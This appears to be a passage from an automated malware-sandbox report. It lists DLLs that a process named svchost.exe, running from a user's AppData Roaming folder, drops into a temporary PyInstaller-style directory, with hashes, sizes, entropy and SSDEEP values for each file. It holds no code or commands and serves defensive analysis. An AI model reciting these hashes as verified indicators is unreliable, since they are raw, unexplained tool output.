                          SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                          MD5:CB978304B79EF53962408C611DFB20F5
                          SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                          SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                          SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-debug-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1028816880814265
                          Encrypted:false
                          SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                          MD5:88FF191FD8648099592ED28EE6C442A5
                          SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                          SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                          SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-errorhandling-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.126358371711227
                          Encrypted:false
                          SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                          MD5:6D778E83F74A4C7FE4C077DC279F6867
                          SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                          SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                          SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):21816
                          Entropy (8bit):7.014255619395433
                          Encrypted:false
                          SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                          MD5:94AE25C7A5497CA0BE6882A00644CA64
                          SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                          SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                          SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.112057846012794
                          Encrypted:false
                          SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                          MD5:E2F648AE40D234A3892E1455B4DBBE05
                          SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                          SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                          SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l2-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.166618249693435
                          Encrypted:false
                          SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                          MD5:E479444BDD4AE4577FD32314A68F5D28
                          SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                          SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                          SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-handle-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1117101479630005
                          Encrypted:false
                          SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                          MD5:6DB54065B33861967B491DD1C8FD8595
                          SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                          SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                          SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-heap-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.174986589968396
                          Encrypted:false
                          SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                          MD5:2EA3901D7B50BF6071EC8732371B821C
                          SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                          SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                          SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-interlocked-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17856
                          Entropy (8bit):7.076803035880586
                          Encrypted:false
                          SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                          MD5:D97A1CB141C6806F0101A5ED2673A63D
                          SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                          SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                          SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-libraryloader-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.131154779640255
                          Encrypted:false
                          SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                          MD5:D0873E21721D04E20B6FFB038ACCF2F1
                          SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                          SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                          SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-localization-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.089032314841867
                          Encrypted:false
                          SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                          MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                          SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                          SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                          SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-memory-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.101895292899441
                          Encrypted:false
                          SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                          MD5:D500D9E24F33933956DF0E26F087FD91
                          SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                          SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                          SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-namedpipe-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.16337963516533
                          Encrypted:false
                          SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                          MD5:6F6796D1278670CCE6E2D85199623E27
                          SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                          SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                          SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processenvironment-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.073730829887072
                          Encrypted:false
                          SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                          MD5:5F73A814936C8E7E4A2DFD68876143C8
                          SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                          SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                          SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processthreads-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19392
                          Entropy (8bit):7.082421046253008
                          Encrypted:false
                          SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                          MD5:A2D7D7711F9C0E3E065B2929FF342666
                          SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                          SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                          SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processthreads-l1-1-1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.1156948849491055
                          Encrypted:false
                          SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                          MD5:D0289835D97D103BAD0DD7B9637538A1
                          SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                          SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                          SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-profile-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17712
                          Entropy (8bit):7.187691342157284
                          Encrypted:false
                          SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                          MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                          SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                          SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                          SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-rtlsupport-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17720
                          Entropy (8bit):7.19694878324007
                          Encrypted:false
                          SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                          MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                          SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                          SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                          SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-string-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.137724132900032
                          Encrypted:false
                          SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                          MD5:12CC7D8017023EF04EBDD28EF9558305
                          SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                          SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                          SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-synch-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.04640581473745
                          Encrypted:false
                          SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                          MD5:71AF7ED2A72267AAAD8564524903CFF6
                          SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                          SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                          SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-synch-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.138910839042951
                          Encrypted:false
                          SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                          MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                          SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                          SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                          SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-sysinfo-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.072555805949365
                          Encrypted:false
                          SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                          MD5:19A40AF040BD7ADD901AA967600259D9
                          SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                          SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                          SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-timezone-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18224
                          Entropy (8bit):7.17450177544266
                          Encrypted:false
                          SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                          MD5:BABF80608FD68A09656871EC8597296C
                          SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                          SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                          SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-util-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1007227686954275
                          Encrypted:false
                          SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                          MD5:0F079489ABD2B16751CEB7447512A70D
                          SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                          SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                          SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-conio-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.088693688879585
                          Encrypted:false
                          SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                          MD5:6EA692F862BDEB446E649E4B2893E36F
                          SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                          SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                          SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-convert-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22328
                          Entropy (8bit):6.929204936143068
                          Encrypted:false
                          SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                          MD5:72E28C902CD947F9A3425B19AC5A64BD
                          SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                          SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                          SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-environment-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18736
                          Entropy (8bit):7.078409479204304
                          Encrypted:false
                          SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                          MD5:AC290DAD7CB4CA2D93516580452EDA1C
                          SHA1:FA949453557D0049D723F9615E4F390010520EDA
                          SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                          SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-filesystem-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.085387497246545
                          Encrypted:false
                          SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                          MD5:AEC2268601470050E62CB8066DD41A59
                          SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                          SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                          SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-heap-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.060393359865728
                          Encrypted:false
                          SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                          MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                          SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                          SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                          SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-locale-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.13172731865352
                          Encrypted:false
                          SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                          MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                          SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                          SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                          SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-math-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):28984
                          Entropy (8bit):6.6686462438397
                          Encrypted:false
                          SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                          MD5:8B0BA750E7B15300482CE6C961A932F0
                          SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                          SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                          SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-process-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.076072254895036
                          Encrypted:false
                          SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                          MD5:8D02DD4C29BD490E672D271700511371
                          SHA1:F3035A756E2E963764912C6B432E74615AE07011
                          SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
